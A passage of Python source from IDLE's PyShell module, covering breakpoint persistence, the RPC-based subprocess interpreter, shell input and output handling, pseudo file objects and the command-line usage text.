'breakpoints.lst') # whenever a file is changed, restore breakpoints def filename_changed_hook(old_hook=self.io.filename_change_hook, self=self): self.restore_file_breaks() old_hook() self.io.set_filename_change_hook(filename_changed_hook) if self.io.filename: self.restore_file_breaks() self.color_breakpoint_text() rmenu_specs = [ ("Cut", "<<cut>>", "rmenu_check_cut"), ("Copy", "<<copy>>", "rmenu_check_copy"), ("Paste", "<<paste>>", "rmenu_check_paste"), (None, None, None), ("Set Breakpoint", "<<set-breakpoint-here>>", None), ("Clear Breakpoint", "<<clear-breakpoint-here>>", None) ] def color_breakpoint_text(self, color=True): "Turn colorizing of breakpoint text on or off" if color: theme = idleConf.GetOption('main','Theme','name') cfg = idleConf.GetHighlight(theme, "break") else: cfg = {'foreground': '', 'background': ''} self.text.tag_config('BREAK', cfg) def set_breakpoint(self, lineno): text = self.text filename = self.io.filename text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1)) try: i = self.breakpoints.index(lineno) except ValueError: # only add if missing, i.e. do once self.breakpoints.append(lineno) try: # update the subprocess debugger debug = self.flist.pyshell.interp.debugger debug.set_breakpoint_here(filename, lineno) except: # but debugger may not be active right now.... pass def set_breakpoint_here(self, event=None): text = self.text filename = self.io.filename if not filename: text.bell() return lineno = int(float(text.index("insert"))) self.set_breakpoint(lineno) def clear_breakpoint_here(self, event=None): text = self.text filename = self.io.filename if not filename: text.bell() return lineno = int(float(text.index("insert"))) try: self.breakpoints.remove(lineno) except: pass text.tag_remove("BREAK", "insert linestart",\ "insert lineend +1char") try: debug = self.flist.pyshell.interp.debugger debug.clear_breakpoint_here(filename, lineno) except: pass def clear_file_breaks(self): if self.breakpoints: text = self.text filename = self.io.filename if not filename: text.bell() return self.breakpoints = [] text.tag_remove("BREAK", "1.0", END) try: debug = self.flist.pyshell.interp.debugger debug.clear_file_breaks(filename) except: pass def store_file_breaks(self): "Save breakpoints when file is saved" # XXX 13 Dec 2002 KBK Currently the file must be saved before it can # be run. The breaks are saved at that time. If we introduce # a temporary file save feature the save breaks functionality # needs to be re-verified, since the breaks at the time the # temp file is created may differ from the breaks at the last # permanent save of the file. Currently, a break introduced # after a save will be effective, but not persistent. # This is necessary to keep the saved breaks synched with the # saved file. # # Breakpoints are set as tagged ranges in the text. Certain # kinds of edits cause these ranges to be deleted: Inserting # or deleting a line just before a breakpoint, and certain # deletions prior to a breakpoint. These issues need to be # investigated and understood. It's not clear if they are # Tk issues or IDLE issues, or whether they can actually # be fixed. Since a modified file has to be saved before it is # run, and since self.breakpoints (from which the subprocess # debugger is loaded) is updated during the save, the visible # breaks stay synched with the subprocess even if one of these # unexpected breakpoint deletions occurs. breaks = self.breakpoints filename = self.io.filename try: with open(self.breakpointPath, "r") as fp: lines = fp.readlines() except OSError: lines = [] try: with open(self.breakpointPath, "w") as new_file: for line in lines: if not line.startswith(filename + '='): new_file.write(line) self.update_breakpoints() breaks = self.breakpoints if breaks: new_file.write(filename + '=' + str(breaks) + '\n') except OSError as err: if not getattr(self.root, "breakpoint_error_displayed", False): self.root.breakpoint_error_displayed = True tkMessageBox.showerror(title='IDLE Error', message='Unable to update breakpoint list:\n%s' % str(err), parent=self.text) def restore_file_breaks(self): self.text.update() # this enables setting "BREAK" tags to be visible if self.io is None: # can happen if IDLE closes due to the .update() call return filename = self.io.filename if filename is None: return if os.path.isfile(self.breakpointPath): with open(self.breakpointPath, "r") as fp: lines = fp.readlines() for line in lines: if line.startswith(filename + '='): breakpoint_linenumbers = eval(line[len(filename)+1:]) for breakpoint_linenumber in breakpoint_linenumbers: self.set_breakpoint(breakpoint_linenumber) def update_breakpoints(self): "Retrieves all the breakpoints in the current window" text = self.text ranges = text.tag_ranges("BREAK") linenumber_list = self.ranges_to_linenumbers(ranges) self.breakpoints = linenumber_list def ranges_to_linenumbers(self, ranges): lines = [] for index in range(0, len(ranges), 2): lineno = int(float(ranges[index].string)) end = int(float(ranges[index+1].string)) while lineno < end: lines.append(lineno) lineno += 1 return lines # XXX 13 Dec 2002 KBK Not used currently # def saved_change_hook(self): # "Extend base method - clear breaks if module is modified" # if not self.get_saved(): # self.clear_file_breaks() # EditorWindow.saved_change_hook(self) def _close(self): "Extend base method - clear breaks when module is closed" self.clear_file_breaks() EditorWindow._close(self) class PyShellFileList(FileList): "Extend base class: IDLE supports a shell and breakpoints" # override FileList's class variable, instances return PyShellEditorWindow # instead of EditorWindow when new edit windows are created. EditorWindow = PyShellEditorWindow pyshell = None def open_shell(self, event=None): if self.pyshell: self.pyshell.top.wakeup() else: self.pyshell = PyShell(self) if self.pyshell: if not self.pyshell.begin(): return None return self.pyshell class ModifiedColorDelegator(ColorDelegator): "Extend base class: colorizer for the shell window itself" def __init__(self): ColorDelegator.__init__(self) self.LoadTagDefs() def recolorize_main(self): self.tag_remove("TODO", "1.0", "iomark") self.tag_add("SYNC", "1.0", "iomark") ColorDelegator.recolorize_main(self) def LoadTagDefs(self): ColorDelegator.LoadTagDefs(self) theme = idleConf.GetOption('main','Theme','name') self.tagdefs.update({ "stdin": {'background':None,'foreground':None}, "stdout": idleConf.GetHighlight(theme, "stdout"), "stderr": idleConf.GetHighlight(theme, "stderr"), "console": idleConf.GetHighlight(theme, "console"), }) def removecolors(self): # Don't remove shell color tags before "iomark" for tag in self.tagdefs: self.tag_remove(tag, "iomark", "end") class ModifiedUndoDelegator(UndoDelegator): "Extend base class: forbid insert/delete before the I/O mark" def insert(self, index, chars, tags=None): try: if self.delegate.compare(index, "<", "iomark"): self.delegate.bell() return except TclError: pass UndoDelegator.insert(self, index, chars, tags) def delete(self, index1, index2=None): try: if self.delegate.compare(index1, "<", "iomark"): self.delegate.bell() return except TclError: pass UndoDelegator.delete(self, index1, index2) class MyRPCClient(rpc.RPCClient): def handle_EOF(self): "Override the base class - just re-raise EOFError" raise EOFError class ModifiedInterpreter(InteractiveInterpreter): def __init__(self, tkconsole): self.tkconsole = tkconsole locals = sys.modules['__main__'].__dict__ InteractiveInterpreter.__init__(self, locals=locals) self.save_warnings_filters = None self.restarting = False self.subprocess_arglist = None self.port = PORT self.original_compiler_flags = self.compile.compiler.flags _afterid = None rpcclt = None rpcsubproc = None def spawn_subprocess(self): if self.subprocess_arglist is None: self.subprocess_arglist = self.build_subprocess_arglist() self.rpcsubproc = subprocess.Popen(self.subprocess_arglist) def build_subprocess_arglist(self): assert (self.port!=0), ( "Socket should have been assigned a port number.") w = ['-W' + s for s in sys.warnoptions] # Maybe IDLE is installed and is being accessed via sys.path, # or maybe it's not installed and the idle.py script is being # run from the IDLE source directory. del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc', default=False, type='bool') if __name__ == 'idlelib.PyShell': command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,) else: command = "__import__('run').main(%r)" % (del_exitf,) return [sys.executable] + w + ["-c", command, str(self.port)] def start_subprocess(self): addr = (HOST, self.port) # GUI makes several attempts to acquire socket, listens for connection for i in range(3): time.sleep(i) try: self.rpcclt = MyRPCClient(addr) break except OSError as err: pass else: self.display_port_binding_error() return None # if PORT was 0, system will assign an 'ephemeral' port. Find it out: self.port = self.rpcclt.listening_sock.getsockname()[1] # if PORT was not 0, probably working with a remote execution server if PORT != 0: # To allow reconnection within the 2MSL wait (cf. Stevens TCP # V1, 18.6), set SO_REUSEADDR. Note that this can be problematic # on Windows since the implementation allows two active sockets on # the same address! self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.spawn_subprocess() #time.sleep(20) # test to simulate GUI not accepting connection # Accept the connection from the Python execution server self.rpcclt.listening_sock.settimeout(10) try: self.rpcclt.accept() except socket.timeout as err: self.display_no_subprocess_error() return None self.rpcclt.register("console", self.tkconsole) self.rpcclt.register("stdin", self.tkconsole.stdin) self.rpcclt.register("stdout", self.tkconsole.stdout) self.rpcclt.register("stderr", self.tkconsole.stderr) self.rpcclt.register("flist", self.tkconsole.flist) self.rpcclt.register("linecache", linecache) self.rpcclt.register("interp", self) self.transfer_path(with_cwd=True) self.poll_subprocess() return self.rpcclt def restart_subprocess(self, with_cwd=False): if self.restarting: return self.rpcclt self.restarting = True # close only the subprocess debugger debug = self.getdebugger() if debug: try: # Only close subprocess debugger, don't unregister gui_adap! RemoteDebugger.close_subprocess_debugger(self.rpcclt) except: pass # Kill subprocess, spawn a new one, accept connection. self.rpcclt.close() self.terminate_subprocess() console = self.tkconsole was_executing = console.executing console.executing = False self.spawn_subprocess() try: self.rpcclt.accept() except socket.timeout as err: self.display_no_subprocess_error() return None self.transfer_path(with_cwd=with_cwd) console.stop_readline() # annotate restart in shell window and mark it console.text.delete("iomark", "end-1c") if was_executing: console.write('\n') console.showprompt() halfbar = ((int(console.width) - 16) // 2) * '=' console.write(halfbar + ' RESTART ' + halfbar) console.text.mark_set("restart", "end-1c") console.text.mark_gravity("restart", "left") console.showprompt() # restart subprocess debugger if debug: # Restarted debugger connects to current instance of debug GUI gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt) # reload remote debugger breakpoints for all PyShellEditWindows debug.load_breakpoints() self.compile.compiler.flags = self.original_compiler_flags self.restarting = False return self.rpcclt def __request_interrupt(self): self.rpcclt.remotecall("exec", "interrupt_the_server", (), {}) def interrupt_subprocess(self): threading.Thread(target=self.__request_interrupt).start() def kill_subprocess(self): if self._afterid is not None: self.tkconsole.text.after_cancel(self._afterid) try: self.rpcclt.listening_sock.close() except AttributeError: # no socket pass try: self.rpcclt.close() except AttributeError: # no socket pass self.terminate_subprocess() self.tkconsole.executing = False self.rpcclt = None def terminate_subprocess(self): "Make sure subprocess is terminated" try: self.rpcsubproc.kill() except OSError: # process already terminated return else: try: self.rpcsubproc.wait() except OSError: return def transfer_path(self, with_cwd=False): if with_cwd: # Issue 13506 path = [''] # include Current Working Directory path.extend(sys.path) else: path = sys.path self.runcommand("""if 1: import sys as _sys _sys.path = %r del _sys \n""" % (path,)) active_seq = None def poll_subprocess(self): clt = self.rpcclt if clt is None: return try: response = clt.pollresponse(self.active_seq, wait=0.05) except (EOFError, OSError, KeyboardInterrupt): # lost connection or subprocess terminated itself, restart # [the KBI is from rpc.SocketIO.handle_EOF()] if self.tkconsole.closing: return response = None self.restart_subprocess() if response: self.tkconsole.resetoutput() self.active_seq = None how, what = response console = self.tkconsole.console if how == "OK": if what is not None: print(repr(what), file=console) elif how == "EXCEPTION": if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"): self.remote_stack_viewer() elif how == "ERROR": errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n" print(errmsg, what, file=sys.__stderr__) print(errmsg, what, file=console) # we received a response to the currently active seq number: try: self.tkconsole.endexecuting() except AttributeError: # shell may have closed pass # Reschedule myself if not self.tkconsole.closing: self._afterid = self.tkconsole.text.after( self.tkconsole.pollinterval, self.poll_subprocess) debugger = None def setdebugger(self, debugger): self.debugger = debugger def getdebugger(self): return self.debugger def open_remote_stack_viewer(self): """Initiate the remote stack viewer from a separate thread. This method is called from the subprocess, and by returning from this method we allow the subprocess to unblock. After a bit the shell requests the subprocess to open the remote stack viewer which returns a static object looking at the last exception. It is queried through the RPC mechanism. """ self.tkconsole.text.after(300, self.remote_stack_viewer) return def remote_stack_viewer(self): from idlelib import RemoteObjectBrowser oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {}) if oid is None: self.tkconsole.root.bell() return item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid) from idlelib.TreeWidget import ScrolledCanvas, TreeNode top = Toplevel(self.tkconsole.root) theme = idleConf.GetOption('main','Theme','name') background = idleConf.GetHighlight(theme, 'normal')['background'] sc = ScrolledCanvas(top, bg=background, highlightthickness=0) sc.frame.pack(expand=1, fill="both") node = TreeNode(sc.canvas, None, item) node.expand() # XXX Should GC the remote tree when closing the window gid = 0 def execsource(self, source): "Like runsource() but assumes complete exec source" filename = self.stuffsource(source) self.execfile(filename, source) def execfile(self, filename, source=None): "Execute an existing file" if source is None: with tokenize.open(filename) as fp: source = fp.read() try: code = compile(source, filename, "exec") except (OverflowError, SyntaxError): self.tkconsole.resetoutput() print('*** Error in script or command!\n' 'Traceback (most recent call last):', file=self.tkconsole.stderr) InteractiveInterpreter.showsyntaxerror(self, filename) self.tkconsole.showprompt() else: self.runcode(code) def runsource(self, source): "Extend base class method: Stuff the source in the line cache first" filename = self.stuffsource(source) self.more = 0 self.save_warnings_filters = warnings.filters[:] warnings.filterwarnings(action="error", category=SyntaxWarning) # at the moment, InteractiveInterpreter expects str assert isinstance(source, str) #if isinstance(source, str): # from idlelib import IOBinding # try: # source = source.encode(IOBinding.encoding) # except UnicodeError: # self.tkconsole.resetoutput() # self.write("Unsupported characters in input\n") # return try: # InteractiveInterpreter.runsource() calls its runcode() method, # which is overridden (see below) return InteractiveInterpreter.runsource(self, source, filename) finally: if self.save_warnings_filters is not None: warnings.filters[:] = self.save_warnings_filters self.save_warnings_filters = None def stuffsource(self, source): "Stuff source in the filename cache" filename = "<pyshell#%d>" % self.gid self.gid = self.gid + 1 lines = source.split("\n") linecache.cache[filename] = len(source)+1, 0, lines, filename return filename def prepend_syspath(self, filename): "Prepend sys.path with file's directory if not already included" self.runcommand("""if 1: _filename = %r import sys as _sys from os.path import dirname as _dirname _dir = _dirname(_filename) if not _dir in _sys.path: _sys.path.insert(0, _dir) del _filename, _sys, _dirname, _dir \n""" % (filename,)) def showsyntaxerror(self, filename=None): """Override Interactive Interpreter method: Use Colorizing Color the offending position instead of printing it and pointing at it with a caret. """ tkconsole = self.tkconsole text = tkconsole.text text.tag_remove("ERROR", "1.0", "end") type, value, tb = sys.exc_info() msg = getattr(value, 'msg', '') or value or "<no detail available>" lineno = getattr(value, 'lineno', '') or 1 offset = getattr(value, 'offset', '') or 0 if offset == 0: lineno += 1 #mark end of offending line if lineno == 1: pos = "iomark + %d chars" % (offset-1) else: pos = "iomark linestart + %d lines + %d chars" % \ (lineno-1, offset-1) tkconsole.colorize_syntax_error(text, pos) tkconsole.resetoutput() self.write("SyntaxError: %s\n" % msg) tkconsole.showprompt() def showtraceback(self): "Extend base class method to reset output properly" self.tkconsole.resetoutput() self.checklinecache() InteractiveInterpreter.showtraceback(self) if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"): self.tkconsole.open_stack_viewer() def checklinecache(self): c = linecache.cache for key in list(c.keys()): if key[:1] + key[-1:] != "<>": del c[key] def runcommand(self, code): "Run the code without invoking the debugger" # The code better not raise an exception! if self.tkconsole.executing: self.display_executing_dialog() return 0 if self.rpcclt: self.rpcclt.remotequeue("exec", "runcode", (code,), {}) else: exec(code, self.locals) return 1 def runcode(self, code): "Override base class method" if self.tkconsole.executing: self.interp.restart_subprocess() self.checklinecache() if self.save_warnings_filters is not None: warnings.filters[:] = self.save_warnings_filters self.save_warnings_filters = None debugger = self.debugger try: self.tkconsole.beginexecuting() if not debugger and self.rpcclt is not None: self.active_seq = self.rpcclt.asyncqueue("exec", "runcode", (code,), {}) elif debugger: debugger.run(code, self.locals) else: exec(code, self.locals) except SystemExit: if not self.tkconsole.closing: if tkMessageBox.askyesno( "Exit?", "Do you want to exit altogether?", default="yes", master=self.tkconsole.text): raise else: self.showtraceback() else: raise except: if use_subprocess: print("IDLE internal error in runcode()", file=self.tkconsole.stderr) self.showtraceback() self.tkconsole.endexecuting() else: if self.tkconsole.canceled: self.tkconsole.canceled = False print("KeyboardInterrupt", file=self.tkconsole.stderr) else: self.showtraceback() finally: if not use_subprocess: try: self.tkconsole.endexecuting() except AttributeError: # shell may have closed pass def write(self, s): "Override base class method" return self.tkconsole.stderr.write(s) def display_port_binding_error(self): tkMessageBox.showerror( "Port Binding Error", "IDLE can't bind to a TCP/IP port, which is necessary to " "communicate with its Python execution server. This might be " "because no networking is installed on this computer. " "Run IDLE with the -n command line switch to start without a " "subprocess and refer to Help/IDLE Help 'Running without a " "subprocess' for further details.", master=self.tkconsole.text) def display_no_subprocess_error(self): tkMessageBox.showerror( "Subprocess Startup Error", "IDLE's subprocess didn't make connection. Either IDLE can't " "start a subprocess or personal firewall software is blocking " "the connection.", master=self.tkconsole.text) def display_executing_dialog(self): tkMessageBox.showerror( "Already executing", "The Python Shell window is already executing a command; " "please wait until it is finished.", master=self.tkconsole.text) class PyShell(OutputWindow): shell_title = "Python " + python_version() + " Shell" # Override classes ColorDelegator = ModifiedColorDelegator UndoDelegator = ModifiedUndoDelegator # Override menus menu_specs = [ ("file", "_File"), ("edit", "_Edit"), ("debug", "_Debug"), ("options", "_Options"), ("windows", "_Windows"), ("help", "_Help"), ] if sys.platform == "darwin": menu_specs[-2] = ("windows", "_Window") # New classes from idlelib.IdleHistory import History def __init__(self, flist=None): if use_subprocess: ms = self.menu_specs if ms[2][0] != "shell": ms.insert(2, ("shell", "She_ll")) self.interp = ModifiedInterpreter(self) if flist is None: root = Tk() fixwordbreaks(root) root.withdraw() flist = PyShellFileList(root) # OutputWindow.__init__(self, flist, None, None) # ## self.config(usetabs=1, indentwidth=8, context_use_ps1=1) self.usetabs = True # indentwidth must be 8 when using tabs. See note in EditorWindow: self.indentwidth = 8 self.context_use_ps1 = True # text = self.text text.configure(wrap="char") text.bind("<<newline-and-indent>>", self.enter_callback) text.bind("<<plain-newline-and-indent>>", self.linefeed_callback) text.bind("<<interrupt-execution>>", self.cancel_callback) text.bind("<<end-of-file>>", self.eof_callback) text.bind("<<open-stack-viewer>>", self.open_stack_viewer) text.bind("<<toggle-debugger>>", self.toggle_debugger) text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer) if use_subprocess: text.bind("<<view-restart>>", self.view_restart_mark) text.bind("<<restart-shell>>", self.restart_shell) # self.save_stdout = sys.stdout self.save_stderr = sys.stderr self.save_stdin = sys.stdin from idlelib import IOBinding self.stdin = PseudoInputFile(self, "stdin", IOBinding.encoding) self.stdout = PseudoOutputFile(self, "stdout", IOBinding.encoding) self.stderr = PseudoOutputFile(self, "stderr", IOBinding.encoding) self.console = PseudoOutputFile(self, "console", IOBinding.encoding) if not use_subprocess: sys.stdout = self.stdout sys.stderr = self.stderr sys.stdin = self.stdin try: # page help() text to shell. import pydoc # import must be done here to capture i/o rebinding. # XXX KBK 27Dec07 use a textView someday, but must work w/o subproc pydoc.pager = pydoc.plainpager except: sys.stderr = sys.__stderr__ raise # self.history = self.History(self.text) # self.pollinterval = 50 # millisec def get_standard_extension_names(self): return idleConf.GetExtensions(shell_only=True) reading = False executing = False canceled = False endoffile = False closing = False _stop_readline_flag = False def set_warning_stream(self, stream): global warning_stream warning_stream = stream def get_warning_stream(self): return warning_stream def toggle_debugger(self, event=None): if self.executing: tkMessageBox.showerror("Don't debug now", "You can only toggle the debugger when idle", master=self.text) self.set_debugger_indicator() return "break" else: db = self.interp.getdebugger() if db: self.close_debugger() else: self.open_debugger() def set_debugger_indicator(self): db = self.interp.getdebugger() self.setvar("<<toggle-debugger>>", not not db) def toggle_jit_stack_viewer(self, event=None): pass # All we need is the variable def close_debugger(self): db = self.interp.getdebugger() if db: self.interp.setdebugger(None) db.close() if self.interp.rpcclt: RemoteDebugger.close_remote_debugger(self.interp.rpcclt) self.resetoutput() self.console.write("[DEBUG OFF]\n") sys.ps1 = ">>> " self.showprompt() self.set_debugger_indicator() def open_debugger(self): if self.interp.rpcclt: dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt, self) else: dbg_gui = Debugger.Debugger(self) self.interp.setdebugger(dbg_gui) dbg_gui.load_breakpoints() sys.ps1 = "[DEBUG ON]\n>>> " self.showprompt() self.set_debugger_indicator() def beginexecuting(self): "Helper for ModifiedInterpreter" self.resetoutput() self.executing = 1 def endexecuting(self): "Helper for ModifiedInterpreter" self.executing = 0 self.canceled = 0 self.showprompt() def close(self): "Extend EditorWindow.close()" if self.executing: response = tkMessageBox.askokcancel( "Kill?", "The program is still running!\n Do you want to kill it?", default="ok", parent=self.text) if response is False: return "cancel" self.stop_readline() self.canceled = True self.closing = True return EditorWindow.close(self) def _close(self): "Extend EditorWindow._close(), shut down debugger and execution server" self.close_debugger() if use_subprocess: self.interp.kill_subprocess() # Restore std streams sys.stdout = self.save_stdout sys.stderr = self.save_stderr sys.stdin = self.save_stdin # Break cycles self.interp = None self.console = None self.flist.pyshell = None self.history = None EditorWindow._close(self) def ispythonsource(self, filename): "Override EditorWindow method: never remove the colorizer" return True def short_title(self): return self.shell_title COPYRIGHT = \ 'Type "copyright", "credits" or "license()" for more information.' def begin(self): self.text.mark_set("iomark", "insert") self.resetoutput() if use_subprocess: nosub = '' client = self.interp.start_subprocess() if not client: self.close() return False else: nosub = ("==== No Subprocess ====\n\n" + "WARNING: Running IDLE without a Subprocess is deprecated\n" + "and will be removed in a later version. See Help/IDLE Help\n" + "for details.\n\n") sys.displayhook = rpc.displayhook self.write("Python %s on %s\n%s\n%s" % (sys.version, sys.platform, self.COPYRIGHT, nosub)) self.showprompt() import tkinter tkinter._default_root = None # 03Jan04 KBK What's this? return True def stop_readline(self): if not self.reading: # no nested mainloop to exit. return self._stop_readline_flag = True self.top.quit() def readline(self): save = self.reading try: self.reading = 1 self.top.mainloop() # nested mainloop() finally: self.reading = save if self._stop_readline_flag: self._stop_readline_flag = False return "" line = self.text.get("iomark", "end-1c") if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C line = "\n" self.resetoutput() if self.canceled: self.canceled = 0 if not use_subprocess: raise KeyboardInterrupt if self.endoffile: self.endoffile = 0 line = "" return line def isatty(self): return True def cancel_callback(self, event=None): try: if self.text.compare("sel.first", "!=", "sel.last"): return # Active selection -- always use default binding except: pass if not (self.executing or self.reading): self.resetoutput() self.interp.write("KeyboardInterrupt\n") self.showprompt() return "break" self.endoffile = 0 self.canceled = 1 if (self.executing and self.interp.rpcclt): if self.interp.getdebugger(): self.interp.restart_subprocess() else: self.interp.interrupt_subprocess() if self.reading: self.top.quit() # exit the nested mainloop() in readline() return "break" def eof_callback(self, event): if self.executing and not self.reading: return # Let the default binding (delete next char) take over if not (self.text.compare("iomark", "==", "insert") and self.text.compare("insert", "==", "end-1c")): return # Let the default binding (delete next char) take over if not self.executing: self.resetoutput() self.close() else: self.canceled = 0 self.endoffile = 1 self.top.quit() return "break" def linefeed_callback(self, event): # Insert a linefeed without entering anything (still autoindented) if self.reading: self.text.insert("insert", "\n") self.text.see("insert") else: self.newline_and_indent_event(event) return "break" def enter_callback(self, event): if self.executing and not self.reading: return # Let the default binding (insert '\n') take over # If some text is selected, recall the selection # (but only if this before the I/O mark) try: sel = self.text.get("sel.first", "sel.last") if sel: if self.text.compare("sel.last", "<=", "iomark"): self.recall(sel, event) return "break" except: pass # If we're strictly before the line containing iomark, recall # the current line, less a leading prompt, less leading or # trailing whitespace if self.text.compare("insert", "<", "iomark linestart"): # Check if there's a relevant stdin range -- if so, use it prev = self.text.tag_prevrange("stdin", "insert") if prev and self.text.compare("insert", "<", prev[1]): self.recall(self.text.get(prev[0], prev[1]), event) return "break" next = self.text.tag_nextrange("stdin", "insert") if next and self.text.compare("insert lineend", ">=", next[0]): self.recall(self.text.get(next[0], next[1]), event) return "break" # No stdin mark -- just get the current line, less any prompt indices = self.text.tag_nextrange("console", "insert linestart") if indices and \ self.text.compare(indices[0], "<=", "insert linestart"): self.recall(self.text.get(indices[1], "insert lineend"), event) else: self.recall(self.text.get("insert linestart", "insert lineend"), event) return "break" # If we're between the beginning of the line and the iomark, i.e. # in the prompt area, move to the end of the prompt if self.text.compare("insert", "<", "iomark"): self.text.mark_set("insert", "iomark") # If we're in the current input and there's only whitespace # beyond the cursor, erase that whitespace first s = self.text.get("insert", "end-1c") if s and not s.strip(): self.text.delete("insert", "end-1c") # If we're in the current input before its last line, # insert a newline right at the insert point if self.text.compare("insert", "<", "end-1c linestart"): self.newline_and_indent_event(event) return "break" # We're in the last line; append a newline and submit it self.text.mark_set("insert", "end-1c") if self.reading: self.text.insert("insert", "\n") self.text.see("insert") else: self.newline_and_indent_event(event) self.text.tag_add("stdin", "iomark", "end-1c") self.text.update_idletasks() if self.reading: self.top.quit() # Break out of recursive mainloop() else: self.runit() return "break" def recall(self, s, event): # remove leading and trailing empty or whitespace lines s = re.sub(r'^\s*\n', '' , s) s = re.sub(r'\n\s*$', '', s) lines = s.split('\n') self.text.undo_block_start() try: self.text.tag_remove("sel", "1.0", "end") self.text.mark_set("insert", "end-1c") prefix = self.text.get("insert linestart", "insert") if prefix.rstrip().endswith(':'): self.newline_and_indent_event(event) prefix = self.text.get("insert linestart", "insert") self.text.insert("insert", lines[0].strip()) if len(lines) > 1: orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0) new_base_indent = re.search(r'^([ \t]*)', prefix).group(0) for line in lines[1:]: if line.startswith(orig_base_indent): # replace orig base indentation with new indentation line = new_base_indent + line[len(orig_base_indent):] self.text.insert('insert', '\n'+line.rstrip()) finally: self.text.see("insert") self.text.undo_block_stop() def runit(self): line = self.text.get("iomark", "end-1c") # Strip off last newline and surrounding whitespace. # (To allow you to hit return twice to end a statement.) i = len(line) while i > 0 and line[i-1] in " \t": i = i-1 if i > 0 and line[i-1] == "\n": i = i-1 while i > 0 and line[i-1] in " \t": i = i-1 line = line[:i] more = self.interp.runsource(line) def open_stack_viewer(self, event=None): if self.interp.rpcclt: return self.interp.remote_stack_viewer() try: sys.last_traceback except: tkMessageBox.showerror("No stack trace", "There is no stack trace yet.\n" "(sys.last_traceback is not defined)", master=self.text) return from idlelib.StackViewer import StackBrowser sv = StackBrowser(self.root, self.flist) def view_restart_mark(self, event=None): self.text.see("iomark") self.text.see("restart") def restart_shell(self, event=None): "Callback for Run/Restart Shell Cntl-F6" self.interp.restart_subprocess(with_cwd=True) def showprompt(self): self.resetoutput() try: s = str(sys.ps1) except: s = "" self.console.write(s) self.text.mark_set("insert", "end-1c") self.set_line_and_column() self.io.reset_undo() def resetoutput(self): source = self.text.get("iomark", "end-1c") if self.history: self.history.store(source) if self.text.get("end-2c") != "\n": self.text.insert("end-1c", "\n") self.text.mark_set("iomark", "end-1c") self.set_line_and_column() def write(self, s, tags=()): if isinstance(s, str) and len(s) and max(s) > '\uffff': # Tk doesn't support outputting non-BMP characters # Let's assume what printed string is not very long, # find first non-BMP character and construct informative # UnicodeEncodeError exception. for start, char in enumerate(s): if char > '\uffff': break raise UnicodeEncodeError("UCS-2", char, start, start+1, 'Non-BMP character not supported in Tk') try: self.text.mark_gravity("iomark", "right") count = OutputWindow.write(self, s, tags, "iomark") self.text.mark_gravity("iomark", "left") except: raise ###pass # ### 11Aug07 KBK if we are expecting exceptions # let's find out what they are and be specific. if self.canceled: self.canceled = 0 if not use_subprocess: raise KeyboardInterrupt return count def rmenu_check_cut(self): try: if self.text.compare('sel.first', '<', 'iomark'): return 'disabled' except TclError: # no selection, so the index 'sel.first' doesn't exist return 'disabled' return super().rmenu_check_cut() def rmenu_check_paste(self): if self.text.compare('insert','<','iomark'): return 'disabled' return super().rmenu_check_paste() class PseudoFile(io.TextIOBase): def __init__(self, shell, tags, encoding=None): self.shell = shell self.tags = tags self._encoding = encoding @property def encoding(self): return self._encoding @property def name(self): return '<%s>' % self.tags def isatty(self): return True class PseudoOutputFile(PseudoFile): def writable(self): return True def write(self, s): if self.closed: raise ValueError("write to closed file") if type(s) is not str: if not isinstance(s, str): raise TypeError('must be str, not ' + type(s).__name__) # See issue #19481 s = str.__str__(s) return self.shell.write(s, self.tags) class PseudoInputFile(PseudoFile): def __init__(self, shell, tags, encoding=None): PseudoFile.__init__(self, shell, tags, encoding) self._line_buffer = '' def readable(self): return True def read(self, size=-1): if self.closed: raise ValueError("read from closed file") if size is None: size = -1 elif not isinstance(size, int): raise TypeError('must be int, not ' + type(size).__name__) result = self._line_buffer self._line_buffer = '' if size < 0: while True: line = self.shell.readline() if not line: break result += line else: while len(result) < size: line = self.shell.readline() if not line: break result += line self._line_buffer = result[size:] result = result[:size] return result def readline(self, size=-1): if self.closed: raise ValueError("read from closed file") if size is None: size = -1 elif not isinstance(size, int): raise TypeError('must be int, not ' + type(size).__name__) line = self._line_buffer or self.shell.readline() if size < 0: size = len(line) eol = line.find('\n', 0, size) if eol >= 0: size = eol + 1 self._line_buffer = line[size:] return line[:size] def close(self): self.shell.close() usage_msg = """\ USAGE: idle [-deins] [-t title] [file]* idle [-dns] [-t title] (-c cmd | -r file) [arg]* idle [-dns] [-t title] - [arg]* -h print this help message and exit -n run IDLE without a subprocess (DEPRECATED, see Help/IDLE Help for details) The following options will override the IDLE 'settings' configuration: -e open an edit window -i open a shell window The following options imply -i and will open a shell: -c cmd run the command in a shell, or -r file run script from file -d enable the debugger -s run $IDLESTARTUP or $PYTHONSTARTUP before anything else -t title set title of shell window A default edit window will be bypassed when -c, -r, or - are used. [arg]* are passed to the command (-c) or script (-r) in sys.argv[1:]. Examples: idle Open an edit window or shell depending on IDLE's configuration. idle foo.py foobar.py Edit the files, also open a shell if configured to start with shell. idle -est "Baz" foo.py Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell window with the title "Baz". idle -c "import sys; print(sys.argv)" "foo" Open a shell window and run the command, passing "-c" in sys.argv[0] and "foo" in sys.argv[1]. idle -d -s -r foo.py "Hello World" Open a shell window, run a startup script, enable the debugger, and run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in sys.argv[1]. echo "import sys; print(sys.argv)" | idle - "foobar" Open a shell window, run the script piped in, passing '' in sys.argv[0] and "foobar" in sys.argv[1]. """ def main(): global flist, root, use_subprocess capture_warnings(True) use_subprocess = True enable_shell = False enable_edit = False debug = False cmd = None script = None startup = False try: opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:") except getopt.error as msg: print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr) sys.exit(2) 